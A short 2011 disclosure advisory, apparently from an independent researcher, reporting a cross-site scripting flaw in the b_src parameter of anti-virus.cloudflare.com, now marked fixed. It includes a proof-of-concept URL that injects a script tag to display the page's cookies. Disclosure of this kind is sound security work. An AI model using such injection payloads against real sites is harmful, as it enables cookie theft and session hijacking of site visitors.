The service at anti-virus.cloudflare.com suffers from a cross site scripting vulnerability.
b6ee5497426ebce31868121289c9ae738ae0ad5026abab52cd9dbc4650ad8848
0×1 Site : *http://anti-virus.cloudflare.com*
0×3 Author : *Sandeep Kamble*
0×4 Reported : October 12, 2011
0×6 Public Release : October 17 2011
0×7 Status: Fixed
*Description : *
*Anti-virus.cloudflare.com* is a service for avoiding spams .
This project to stop attacks and educate visitors with infected computers
about how they can clean up their machines.
*Affected Variable :*
* ?b_src=*
*Exploit :*
Executing Javascript using the vulnerable variable called as ?b_src= . This
attack is commonly know as Cross Site Scripting (XSS)
Anti-virus.cloud + affected script having stored Xss attack which can used
for the grabbing the cookies .
POC :
http://anti-virus.cloudflare.com/cdn-cgi/anti-virus-challenge?h=7777772e6578706c6f69742d64622e636f6d2c6578706c6f69742d64622e636f6d&x=f1cd78c0ef2c1d7505afe19491fa0477
&b_src=<script>alert(Document.cookie)</script>
Sandeep Kamble
www.sandeepkamble.com